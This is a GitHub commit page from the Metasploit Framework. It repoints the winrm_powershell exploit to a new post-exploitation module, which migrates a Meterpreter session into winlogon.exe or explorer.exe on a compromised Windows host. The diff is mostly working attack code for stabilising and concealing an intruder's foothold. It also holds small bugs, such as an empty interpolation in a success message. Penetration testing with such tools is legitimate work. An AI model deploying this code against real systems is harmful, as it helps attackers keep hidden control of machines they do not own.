Skip to content

Commit

Permalink
Switc smart mgirate to post mod as it should be
Browse files Browse the repository at this point in the history
  • Loading branch information
David Maloney authored and David Maloney committed Oct 31, 2012
1 parent dd7ab11 commit 00b9fb3
Show file tree
Hide file tree
Showing 3 changed files with 74 additions and 44 deletions.
2 changes: 1 addition & 1 deletion modules/exploits/windows/winrm/winrm_powershell.rb
Original file line number Diff line number Diff line change
Expand Up @@ -37,7 +37,7 @@ def initialize(info = {})
{
'WfsDelay' => 30,
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'smart_migrate',
'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
},
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
Expand Down
73 changes: 73 additions & 0 deletions modules/post/windows/manage/smart_migrate.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,73 @@
##
# $Id$
##

##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Post

def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Process Migration',
'Description' => %q{ This module will migrate a Meterpreter session.
It will first attempt to mgirate to winlogon.exe . If that fails it will
then look at all of the explorer.exe processes. If there is one that exists
for the user context the session is already in it will try that. Failing that it will fall back
and try any other explorer.exe processes it finds},
'License' => MSF_LICENSE,
'Author' => [ 'thelightcosine'],
'Version' => '$Revision$',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))


end

def run
server = client.sys.process.open
original_pid = server.pid
print_status("Current server process: #{server.name} (#{server.pid})")

uid = client.sys.config.getuid

processes = client.sys.process.get_processes

uid_explorer_procs = []
explorer_procs = []
winlogon_procs = []
processes.each do |proc|
uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid
explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid
winlogon_procs << proc if proc['name'] == "winlogon.exe"
end

winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) }
uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }

print_error "Was unable to sucessfully migrate into any of our likely candidates"
end


def attempt_migration(target_pid)
begin
print_good("Migrating to #{target_pid}")
client.core.migrate(target_pid)
print_good("Successfully migrated to process #{}")
return true
rescue ::Exception => e
print_error("Could not migrate in to process.")
print_error(e)
return false
end
end
end
43 changes: 0 additions & 43 deletions scripts/meterpreter/smart_migrate.rb

This file was deleted.

0 comments on commit 00b9fb3

Please sign in to comment.